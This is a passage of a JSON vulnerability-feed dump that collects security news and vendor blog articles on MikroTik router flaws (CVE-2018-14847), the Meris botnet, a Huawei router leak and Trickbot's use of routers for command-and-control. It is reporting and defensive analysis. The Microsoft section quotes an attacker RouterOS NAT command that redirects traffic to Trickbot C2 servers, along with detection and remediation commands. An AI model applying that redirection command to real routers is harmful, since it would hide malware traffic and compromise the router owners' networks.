All the better to scare you with threats to stock price, my dear, Imperva noted: \u201cThe threat actors use this to their advantage by referring to the potential damage a DDoS attack could do to the company stock price.\u201d\n\nNow is the time to prepare for an attack, Imperva warned, particularly given the threat actors\u2019 promise \u2013 be they REvil or REvil wannabes \u2013 to keep hammering away.\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-04T22:46:59", "type": "threatpost", "title": "Massive Meris Botnet Embeds Ransomware Notes from REvil", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2018-14847", "CVE-2021-44228"], "modified": "2022-03-04T22:46:59", "id": "THREATPOST:436D209F4CB01B99FC9576DFE08DE145", "href": "https://threatpost.com/massive-meris-botnet-embeds-ransomware-notes-revil/178769/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-04T07:17:10", "description": "A vulnerability in some Huawei routers used for carrier ISP services allows cybercriminals to identify whether the devices have default credentials or not \u2013 without ever connecting to them.\n\nCVE-2018-7900 exists in the router panel and allows credentials information to leak \u2013 so attackers can simply perform a [ZoomEye](<https://www.zoomeye.org/>) or Shodan IoT search to find a list of the devices having default passwords \u2013 no need for bruteforcing or running the risk of running into a generic honeypot.\n\n\u201cWhen someone has a look at the HTML source code of the login page, a few variables are declared. One of the variables contains a specific value. By monitoring this specific value, one can come to the conclusion that the device has the default password,\u201d explained Ankit Anubhav, principal researcher at NewSky Security, [in a posting](<https://blog.newskysecurity.com/information-disclosure-vulnerability-cve-2018-7900-makes-it-easy-for-attackers-to-find-huawei-3e7039b6f44f>) on Wednesday. \u201cThe attacker can simply go to ZoomEye, find a list of devices, login, and do what they want with minimal hacking skills. 
As easy as that.\u201d\n\nHuawei has issued a fix and worked with its carrier customers to implement it across networks.\n\nNewSky said it wouldn\u2019t disclose exact details of the flaw nor the numbers of affected devices that it uncovered during its own ZoomEye search (though Anubhav referred to the numbers of affected devices as \u201cconcerning\u201d).\n\nThis is only the latest issue affecting carrier-level gear \u2013 and it\u2019s a problematic trend given the scope of the potential attack surface.\n\n\u201cThe attack vectors which can infect a huge number of IoT devices are much more favored than using a vulnerability in a vendor which has only 500 devices online,\u201d said Anubhav. \u201cHence, in 2018 we saw [CVE-2018-14847](<https://threatpost.com/poc-attack-escalates-mikrotik-router-bug-to-as-bad-as-it-gets/138076/>) (MikroTik) and [CVE-2014-8361](<https://threatpost.com/unpatched-router-vulnerability-could-lead-to-code-execution/112524/>) being highly used. One commonality among them is the sheer high number of devices which can be abused using the vulnerabilities. 
Hence, a security loophole in a big IoT vendor can be a more critical issue than a usual one.\u201d\n", "cvss3": {}, "published": "2018-12-20T20:41:46", "type": "threatpost", "title": "Huawei Router Flaw Leaks Default Credential Status", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-8361", "CVE-2018-14847", "CVE-2018-7900"], "modified": "2018-12-20T20:41:46", "id": "THREATPOST:E7D70D8CBF2F64521691B2DF2726498C", "href": "https://threatpost.com/huawei-router-default-credential/140234/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-09T23:38:13", "description": "The routers leveraged by the M\u0113ris botnet in a [massive distributed denial-of-service (DDoS) attack](<https://threatpost.com/yandex-meris-botnet/169368/>) against Russia\u2019s internet giant Yandex have also been the unwitting platform for numerous cyberattacks, researchers have found. This is due to a persistent vulnerable state that\u2019s difficult for organizations to wrangle, but easy for threat actors to exploit, they said.\n\nResearchers from Eclypsium took a deep dive into the feature-rich small office/home office (SOHO) and internet-of-things (IoT) devices [from Latvia-based company](<https://threatpost.com/thousands-of-mikrotik-routers-hijacked-for-eavesdropping/137165/>) MikroTik, which number some 2 million in deployments.\n\nDue to the sheer number of devices in use, their high power and numerous known [vulnerabilities](<https://threatpost.com/poc-attack-escalates-mikrotik-router-bug-to-as-bad-as-it-gets/138076/>) within them, threat actors have been using MikroTik devices for years as the command center from which to launch numerous attacks, researchers said.\n\n## **The MikroTik Attack Surface**\n\nEclypsium researchers began exploring the how and why of the weaponization of MikroTik devices in September, based on previous research into how TrickBot threat actors used compromised routers as command-and-control (C2) infrastructure. 
Eclypsium analysts found that TrickBot also was able to fall back on MikroTik infrastructure after U.S. Cyber Command successfully [disrupted](<https://threatpost.com/trickbot-takedown-crimeware-apparatus/160018/>) its main infrastructure.\n\n\u201cThis made us want to better understand the MikroTik attack surface and how attackers might use them once compromised,\u201d they wrote.\n\nIn addition to their power, one of the chief reasons MikroTik devices are so popular with attackers is that they are, like many SOHO and IoT devices, vulnerable out of the box. They often come with default credentials of admin/empty password, and even devices that are intended for corporate environments come without default settings for the WAN port, researchers wrote.\n\nAdditionally, MikroTik devices often miss out on important firmware patches because their auto-upgrade feature is rarely turned on, \u201cmeaning that many devices are simply never updated,\u201d according to Eclypsium.\n\nThis has allowed CVEs dating back to 2018 and 2019 \u2014 one of which was used in the Yandex attack \u2014 to remain unpatched on many devices and ripe for exploitation, researchers said. 
The bugs tracked as [CVE-2019-3977](<https://nvd.nist.gov/vuln/detail/CVE-2019-3977>), [CVE-2019-3978](<https://nvd.nist.gov/vuln/detail/CVE-2019-3978>), [CVE-2018-14847](<https://nvd.nist.gov/vuln/detail/CVE-2018-14847>) and [CVE-2018-7445](<https://nvd.nist.gov/vuln/detail/CVE-2018-7445>) can all lead to pre-authenticated remote code execution (RCE) \u2014 and a complete takeover of a device.\n\nMikroTik devices also have \u201can incredibly complex configuration interface\u201d that invites easy mistakes from those setting them up, which allows attackers to easily discover and abuse them over the internet, researchers said.\n\n## **Multiple Cyberattack Scenarios**\n\n\u201cThe capabilities demonstrated in these attacks should be a red flag for enterprise security teams,\u201d researchers wrote in [a report](<https://eclypsium.com/2021/12/09/when-honey-bees-become-murder-hornets/>) published Thursday. \u201cThe ability for compromised routers to inject malicious content, tunnel, copy or reroute traffic can be used in a variety of highly damaging ways.\u201d\n\nThese include the use of DNS poisoning to redirect a remote worker\u2019s connection to a malicious website or introduce a machine-in-the-middle attack; the use of well-known techniques and tools to potentially capture sensitive information or steal two-factor authentication (2FA) credentials; the tunneling of enterprise traffic to another location; or the injection of malicious content into valid traffic, researchers said.\n\nThen there was the M\u0113ris botnet attack \u2014 which happened soon after Eclypsium began its research. 
Requests used in the DDoS HTTP-pipelining attack on Russia\u2019s internet giant Yandex in September originated from MikroTik networking gear, with attackers exploiting a 2018 bug unpatched in the more than 56,000 MikroTik hosts involved in the incident.\n\nAnd, Eclypsium also found approximately 20,000 devices with proxies open, which were injecting different crypto-mining scripts into web pages.\n\n\u201cThese devices are both powerful, and as our research shows, often highly vulnerable,\u201d they noted, adding that MikroTik devices, in addition to serving SOHO environments, are regularly used by local Wi-Fi networks, which also attracts attention from attackers, they wrote.\n\nThreatpost has reached out to MikroTik for comment on the researchers\u2019 findings and conclusions.\n\n## **Tool to Mitigate Risk**\n\nResearchers used Shodan queries to build a dataset of 300,000 IP addresses vulnerable to at least one of the aforementioned RCE exploits and also tracked geographically where the devices were located, finding that they are \u201cparticularly widespread,\u201d they wrote. Researchers found that China, Brazil, Russia, Italy and Indonesia had the most total vulnerable devices, with the United States coming in eighth on the list.\n\nEclypsium has created a [freely available tool](<https://github.com/eclypsium/mikrotik_meris_checker>) that could allow network administrators to test their devices\u2019 vulnerability, in three ways: Identify MikroTik devices with CVEs that would allow the device to be taken over; attempt to log in with a given list of default credentials; and check for indicators of compromise of the M\u0113ris botnet.\n\nThe tool works across SSH, WinBox and HTTP API protocols, all of which the M\u0113ris malware uses, researchers said. 
Eclypsium recommended that enterprises using the tool only attempt to log into the MikroTik devices that they own and to take liability for their actions.\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats. _****_[REGISTER TODAY](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_****_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This [LIVE, interactive Threatpost Town Hall](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>), sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken._**\n\n[**_Register NOW_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_** for the LIVE event!**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2021-12-09T15:56:16", "type": "threatpost", "title": "How MikroTik Routers Became a Cybercriminal Target", "bulletinFamily": 
"info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14847", "CVE-2018-7445", "CVE-2019-3977", "CVE-2019-3978"], "modified": "2021-12-09T15:56:16", "id": "THREATPOST:89FA3268B259F5D59A0211160BD3B700", "href": "https://threatpost.com/mikrotik-routers-cybercriminal-target/176894/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T05:50:48", "description": "A new hacking technique used against vulnerable MikroTik routers gives attackers the ability to execute remote code on affected devices. The technique is yet another security blow against the MikroTik router family. Previous hacks have left the routers open to device failures, cryptojacking and network eavesdropping.\n\nThe hacking technique, found by Tenable Research and outlined on Sunday at DerbyCon 8.0 in Louisville, Kentucky, is tied to the existing directory traversal bug (CVE-2018-14847) found and patched in April. That vulnerability was rated medium in severity and impacted Winbox, which is a management component and a Windows GUI application for MikroTik\u2019s RouterOS software.\n\nTenable Research says it has found a new attack technique that exploits the same bug (CVE-2018-14847) that allows for unauthenticated remote code execution. 
\u201cBy exploiting the flaw, the remote attacker can get a root shell on the device as well as bypass the router\u2019s firewall, gain access to the internal network, and even load malware onto victims\u2019 systems undetected,\u201d Tenable Research said in a [blog post accompanying the presentation](<https://www.tenable.com/blog/tenable-research-advisory-multiple-vulnerabilities-discovered-in-mikrotiks-routeros>).\n\nThe underlying flaw is tied to a Winbox Any Directory File that allows threat actors to read files that flow through the router without authentication. The new technique, found by Jacob Baines, researcher at Tenable Research, goes one step further allowing an adversary to write files to the router. Baines also created a proof of concept of the attack outlined Sunday.\n\n\u201cThe licupgr binary has an sprintf that an authenticated user can use to trigger a stack buffer overflow. The sprintf is used on the following string:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/10/07185558/PoC_CVE_MikroTik.jpg>)\n\n\u201cWhere the user has control of the username and password strings, an authenticated user can exploit this to gain root access to the underlying system,\u201d he wrote.\n\nThis is as bad as it gets, Baines told Threatpost. \u201cThis bug was reported in April, but we are now able to show how an attacker can use it to get root shell on a system. It uses CVE-2018-14847 to leak the admin credentials first and then an authenticated code path gives us a back door.\u201d\n\nWhile MikroTik patched CVE-2018-14847 in early August, a recent scan by Tenable Research revealed only approximately 30 percent of vulnerable modems have been patched, which leaves approximately 200,000 routers vulnerable to attack. 
MikroTik\u2019s RouterOS powers the company\u2019s business-grade RouterBOARD brand, as well as ISP/carrier-grade gear from the vendor.\n\n\u201cBased on Shodan analysis, there are hundreds of thousands of MikroTik deployments worldwide, with strong concentrations in Brazil, Indonesia, China, the Russian Federation and India. As of October 3, 2018, approximately 35,000 \u2013 40,000 devices display an updated, patched version,\u201d Tenable Research wrote.\n\nThe read version of the vulnerability is currently being exploited by a number of different campaigns. In August, [it was reported](<https://threatpost.com/huge-cryptomining-attack-on-isp-grade-routers-spreads-globally/134667/>) 3,700 MikroTik routers were being abused in a cryptojacking campaign. [Last month](<https://threatpost.com/thousands-of-mikrotik-routers-hijacked-for-eavesdropping/137165/>), 360 Netlab reported that 7,500 MikroTik routers were forwarding their owners\u2019 traffic to eavesdropping cybercriminals. MikroTik routers have also been targeted by threat actors behind the malware VPNFilter who also used CVE-2018-14847.\n\nTenable researcher Baines said he is not aware of the technique being exploited in the wild. He said MikroTik\u2019s patch for affected _[RouterOS versions 6.40.9, 6.42.7 and 6.43](<https://mikrotik.com/download/changelogs/bugfix-release-tree>)_ stops all attack techniques associated with CVE-2018-14847.\n\nOn Sunday, Tenable Research also announced it had discovered additional MikroTik RouterOS vulnerabilities. 
The vulnerabilities include a stack buffer overflow vulnerability ([CVE-2018-1156](<https://nvd.nist.gov/vuln/detail/CVE-2018-1156>)), a file upload memory exhaustion ([CVE-2018-1157](<https://nvd.nist.gov/vuln/detail/CVE-2018-1157>)), a www memory corruption ([CVE-2018-1159](<https://nvd.nist.gov/vuln/detail/CVE-2018-1159>)) and a recursive parsing stack exhaustion ([CVE-2018-1158](<https://nvd.nist.gov/vuln/detail/CVE-2018-1158>)).\n", "cvss3": {}, "published": "2018-10-08T00:07:04", "type": "threatpost", "title": "PoC Attack Escalates MikroTik Router Bug to \u2018As Bad As It Gets\u2019", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-1156", "CVE-2018-1157", "CVE-2018-1158", "CVE-2018-1159", "CVE-2018-14847"], "modified": "2018-10-08T00:07:04", "id": "THREATPOST:AEFF18A46C45DA195E53C21BB6714562", "href": "https://threatpost.com/poc-attack-escalates-mikrotik-router-bug-to-as-bad-as-it-gets/138076/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "mmpc": [{"lastseen": "2022-03-16T15:46:57", "description": "Trickbot, a sophisticated trojan that has evolved significantly since its discovery in 2016, has continually expanded its capabilities and, even with [disruption efforts](<https://www.microsoft.com/security/blog/2020/10/12/trickbot-disrupted/>) and news of its infrastructure going offline, it has managed to remain one of the most persistent threats in recent years. The malware\u2019s modular nature has allowed it to be increasingly adaptable to different networks, environments, and devices. In addition, it has grown to include numerous plug-ins, access-as-a-service backdoors for other malware like Ryuk ransomware, and mining capabilities. 
A significant part of its evolution also includes making its attacks and infrastructure more durable against detection, including continuously improving its persistence capabilities, [evading researchers and reverse engineering](<https://securityintelligence.com/posts/trickbot-bolsters-layered-defenses-prevent-injection/>), and finding new ways to maintain the stability of its command-and-control (C2) framework.\n\nThis continuous evolution has seen Trickbot expand its reach from computers to Internet of Things (IoT) devices such as routers, with the malware updating its C2 infrastructure to [utilize MikroTik devices and modules](<https://orangecyberdefense.com/uk/blog/cyberdefense/the-trickbot-and-mikrotik-connection/>). [MikroTik](<https://mikrotik.com/>) routers are widely used around the world across different industries. By using MikroTik routers as proxy servers for its C2 servers and redirecting the traffic through non-standard ports, Trickbot adds another persistence layer that helps malicious IPs evade detection by standard security systems.\n\nThe Microsoft Defender for IoT research team has recently discovered the exact method through which MikroTik devices are used in Trickbot\u2019s C2 infrastructure. In this blog, we will share our analysis of the said method and provide insights on how attackers gain access to MikroTik devices and use compromised IoT devices in Trickbot attacks.\n\nThis analysis has enabled us to develop a forensic tool to identify Trickbot-related compromise and other suspicious indicators on MikroTik devices. We [published this tool](<https://github.com/microsoft/routeros-scanner>) to help customers ensure these IoT devices are not susceptible to these attacks. We\u2019re also sharing recommended steps for detection and remediating compromise if found, as well as general prevention steps to protect against future attacks.\n\n_Figure 1. 
Trickbot attack diagram_\n\n## How attackers compromise MikroTik devices for Trickbot C2\n\nTrickbot uses MikroTik devices to create a line of communication between the Trickbot-affected device and the C2 server that standard defense systems in the network are not able to detect. The attackers begin by hacking into a MikroTik router. They do this by acquiring credentials using several methods, which we will discuss in detail in the following section.\n\nThe attackers then issue a unique command that redirects traffic between two ports in the router, establishing the line of communication between Trickbot-affected devices and the C2. MikroTik devices have unique hardware and software, RouterBOARD and RouterOS. This means that to run such a command, the attackers need expertise in RouterOS SSH shell commands. We uncovered this attacker method by tracking traffic containing these SSH shell commands.\n\n_Figure 2. Direct line of communication between the Trickbot-infected device and the Trickbot C2_\n\n### Accessing the MikroTik device and maintaining access\n\nAttackers first need to access the MikroTik shell to run the routing commands. To do so, they need to acquire credentials. As mentioned earlier, based on our analysis, there are several methods that attackers use to access a target router:\n\n * **Using default MikroTik passwords.**\n * **Launching brute force attacks.** We have seen attackers use some unique passwords that probably were harvested from other MikroTik devices.\n * **Exploiting CVE-2018-14847 on devices with RouterOS versions older than 6.42. 
**This vulnerability gives the attacker the ability to read arbitrary files like _user.dat_, which contains passwords.\n\nTo maintain access, the attackers then change the affected router\u2019s password.\n\n### Redirecting traffic\n\nMikroTik devices have a unique Linux-based OS called RouterOS with a unique SSH shell that can be accessed through SSH protocol using a restricted set of commands. These commands can be easily identified by the prefix \u201c/\u201d. For example:\n \n \n /ip \n /system \n /tool\n\nThese commands usually won\u2019t have any meaning on regular Linux-based shells and are solely intended for MikroTik devices. We observed through Microsoft threat data the use of these types of commands. Understanding that these are MikroTik-specific commands, we were able to track their source and intent. For example, we observed attackers issuing the following commands:\n \n \n /ip firewall nat add chain=dstnat proto=tcp dst-port=449 to-port=80 action=dst-nat to-addresses=<infected device> dst-address=<real C2 address>\n\nFrom the command, we can understand the following:\n\n * A new rule, similar to iptables, is created\n * The rule redirects traffic from the device to a server\n * The redirected traffic is received from port 449 and redirected to port 80\n\nThe said command is a legitimate network address translation (NAT) command that allows the NAT router to perform IP address rewriting. In this case, it is being used for malicious activity. Trickbot is known for using ports 443 and 449, and we were able to verify that some target servers were identified as TrickBot C2 servers in the past.\n\nThis analysis highlights the importance of keeping IoT devices secure in today\u2019s ever evolving threat environment. 
Using Microsoft threat data, Microsoft\u2019s IoT and operational technology (OT) security experts established the exact methods that attackers use to leverage compromised IoT devices and gained knowledge that can help us better protect customers from threats.\n\n## Defending IoT devices against Trickbot attacks\n\nAs security solutions for conventional computing devices continue to evolve and improve, attackers will explore alternative ways to compromise target networks. Attack attempts against routers and other IoT devices are not new, and being unmanaged, they can easily be the weakest links in the network. Therefore, organizations should also consider these devices when implementing security policies and best practices.\n\n### An open-source tool for MikroTik forensics\n\nWhile investigating MikroTik and attacks in the wild, we observed several methods of attacking these devices in addition to the method we described in this blog. We aggregated our knowledge of these methods and known CVEs into an open-source tool that can extract the forensic artifacts related to these attacks.\n\nSome of this tool\u2019s functionalities include the following:\n\n * Get the version of the device and map it to CVEs\n * Check for scheduled tasks\n * Look for traffic redirection rules (NAT and other rules)\n * Look for DNS cache poisoning\n * Look for default ports change\n * Look for non-default users\n\nWe have [published the tool in GitHub](<https://github.com/microsoft/routeros-scanner>) and are sharing this tool with the broader community to encourage better intelligence-sharing in the field of IoT security and to help build better protections against threat actors abusing IoT devices.\n\n### How to detect, remediate, and prevent infections\n\nOrganizations with potentially at-risk MikroTik devices can perform the following detection and remediation steps:\n\n * Run the following command to detect if the NAT rule was applied to the device (completed by the tool as well):\n 
\n \n /ip firewall nat print\n\nIf the following data exists, it might indicate infection:\n \n \n chain=dstnat action=dst-nat to-addresses=<public IP address> \n to-ports=80 protocol=tcp dst-address=<your MikroTik IP> dst-port=449 \n chain=srcnat action=masquerade src-address=<your MikroTik IP>\n\n * Run the following command to remove the potentially malicious NAT rule:\n \n \n /ip firewall nat remove numbers=<rule number to remove>\n\nTo prevent future infections, perform the following steps:\n\n * Change the default password to a strong one\n * Block port 8291 from external access\n * Change the SSH port to something other than the default (22)\n * Make sure routers are up to date with the latest firmware and patches\n * Use a secure virtual private network (VPN) service for remote access and restrict remote access to the router\n\n### Protect IoT devices and IT networks with Microsoft Defender\n\nTo harden IoT devices and IT networks against threats like Trickbot, organizations must implement solutions that detect malicious attempts to access devices and raise alerts on anomalous network behavior. [Microsoft Defender for IoT](<https://azure.microsoft.com/services/iot-defender/>) provides agentless, network-layer security that lets organizations deploy continuous asset discovery, vulnerability management, and threat detection for IoT, OT devices, and Industrial Control Systems (ICS) on-premises or in Azure-connected environments. It is updated regularly with indicators of compromise (IoCs) from threat research like the one described in this blog, and rules to detect malicious activity.\n\nMeanwhile, [Microsoft 365 Defender](<https://www.microsoft.com/security/business/threat-protection/microsoft-365-defender>) protects against attacks related to highly modular, multi-stage malware like Trickbot by coordinating threat data across identities, endpoints, cloud apps, email, and documents. 
Such cross-domain visibility allows Microsoft 365 Defender to comprehensively detect and remediate Trickbot\u2019s end-to-end attack chain\u2014from malicious attachments and links it sends via emails to its follow-on activities in endpoints. Its rich set of tools like [advanced hunting](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/advanced-hunting-overview?view=o365-worldwide>) also lets defenders surface threats and gain insights for hardening networks from compromise.\n\nIn addition, working with the Microsoft Defender for IoT Research Team, RiskIQ identified compromised MikroTik routers acting as communication channels for Trickbot C2 and created detection logic to flag devices under threat actor control. [See RiskIQ\u2019s article](<https://community.riskiq.com/article/111d6005>).\n\nTo learn more about securing your IoT and OT devices, explore [Microsoft Defender for IoT](<https://azure.microsoft.com/services/iot-defender/>).\n\n**_David Atch_**_, Section 52 at Microsoft Defender for IoT_ \n**_Noa Frumovich_**_, Section 52 at Microsoft Defender for IoT_ \n**_Ross Bevington_**_, Microsoft Threat Intelligence Center (MSTIC)_\n\nThe post [Uncovering Trickbot\u2019s use of IoT devices in command-and-control infrastructure](<https://www.microsoft.com/security/blog/2022/03/16/uncovering-trickbots-use-of-iot-devices-in-command-and-control-infrastructure/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.2}, "published": "2022-03-16T15:00:00", "type": "mmpc", "title": "Uncovering 
Trickbot\u2019s use of IoT devices in command-and-control infrastructure", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14847"], "modified": "2022-03-16T15:00:00", "id": "MMPC:B4569A8CBDA7CA5A51F286861830C71B", "href": "https://www.microsoft.com/security/blog/2022/03/16/uncovering-trickbots-use-of-iot-devices-in-command-and-control-infrastructure/", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "thn": [{"lastseen": "2022-05-09T12:40:53", "description": "[](<https://thehackernews.com/images/-tskBVOxjDJI/W45Vz--31HI/AAAAAAAAyBs/H6uuVu6zytoo-8uo83JwzA0ZohSApKWAACLcBGAs/s728-e100/mikrotik-router-hacking-attack.png>)\n\nLast month we reported about a widespread crypto-mining malware campaign that [hijacked over 200,000 MikroTik routers](<https://thehackernews.com/2018/08/mikrotik-router-hacking.html>) using a previously disclosed vulnerability revealed in the [CIA Vault 7 leaks](<https://thehackernews.com/2017/03/wikileaks-cia-vault7-leak.html>). \n \nNow Chinese security researchers at Qihoo 360 Netlab have [discovered](<https://blog.netlab.360.com/7500-mikrotik-routers-are-forwarding-owners-traffic-to-the-attackers-how-is-yours-en/>) that out of 370,000 potentially vulnerable MikroTik routers, more than 7,500 devices have been compromised to enable Socks4 proxy maliciously, allowing attackers to actively eavesdrop on the targeted network traffic since mid-July. 
\n \nThe vulnerability in question is Winbox Any Directory File Read (CVE-2018-14847) in MikroTik routers, which was found to be exploited by the [CIA Vault 7 hacking tool](<https://thehackernews.com/2018/06/cia-hacking-tools.html>) called [Chimay Red](<https://github.com/BigNerd95/Chimay-Red>), along with another MikroTik Webfig remote code execution vulnerability. \n \nBoth Winbox and Webfig are RouterOS management components, with their corresponding communication ports being TCP/8291, TCP/80, and TCP/8080. Winbox is designed to let Windows users easily configure the routers; it downloads some DLL files from the router and executes them on the user's system. \n \nAccording to the researchers, more than 370,000 of 1.2 million MikroTik routers are still vulnerable to the CVE-2018-14847 exploit, even after the vendor has already rolled out security updates to patch the loophole. \n \nNetlab researchers have identified malware exploiting the CVE-2018-14847 vulnerability to perform various malicious activities, including CoinHive mining code injection, silently enabling Socks4 proxy on routers, and spying on victims. \n \n**CoinHive Mining Code Injection** \u2014 After enabling the MikroTik RouterOS HTTP proxy, the attackers redirect all HTTP proxy requests to a local HTTP 403 error page that injects a link to web mining code from Coinhive. 
\n\n\n> \"By doing this, the attacker hopes to perform web mining for all the proxy traffic on the users' devices,\" the researchers explain.\n\n> \"What is disappointing for the attacker though, the mining code does not work in this way, because all the external web resources, including those from coinhive.com necessary for web mining, are blocked by the proxy ACLs set by attackers themselves.\"\n\n[](<https://thehackernews.com/images/-y9S_2Ccu0rs/W45MTZ68XGI/AAAAAAAAyBg/1J7kuWQ08-AR8Hs42AJUXgRvBYlDp5ysACLcBGAs/s728-e100/mikrotik-router-hacking-attack.png>)\n\n**Maliciously Enabling Sock4 Proxy** **\u2014 **Silently enabling the Socks4 port or TCP/4153 on victims device allows an attacker to gain control of the device even after it has been rebooted (IP change) by periodically reporting its latest IP address to the attacker's URL. \n \nAccording to the researchers, at present, a total of 239,000 IP addresses are confirmed to have Socks4 proxy enabled maliciously, eventually allowing attackers to continuously scan more MikroTik RouterOS devices using these compromised Socks4 proxy. \n \n**Eavesdropping on Victims \u2014** Since the MikroTik RouterOS devices allow users to capture packets on the router and forward them to the specified Stream server, attackers are forwarding the traffic from compromised routers to IP addresses controlled by them. \n\n\n> \"At present, a total of 7.5k MikroTik RouterOS device IPs have been compromised by the attacker, and their TZSP traffic is being forwarded to some collecting IP addresses,\" the researchers say.\n\n> \"We also noticed the SNMP port 161 and 162 are also top on the list. This deserve some questions, why the attacker is paying attention to the network management protocol regular users barely use? 
Are they trying to monitor and capture some special users' network SNMP community strings?\"\n\nThe victims are spread across various countries, including Russia, Iran, Brazil, India, Ukraine, Bangladesh, Indonesia, Ecuador, the United States, Argentina, Colombia, Poland, Kenya, Iraq, and other European and Asian countries, with Russia being the most affected. \n \nNetlab did not share the IP addresses of the victims with the public for security reasons but said that relevant security entities in affected countries can contact the company for a full list of infected IP addresses. \n \nThe best way to protect yourself is to PATCH. MikroTik RouterOS users are highly recommended to update their devices and also check whether the HTTP proxy, Socks4 proxy, and network traffic capture functions are being maliciously exploited. \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2018-09-04T09:53:00", "type": "thn", "title": "Thousands of 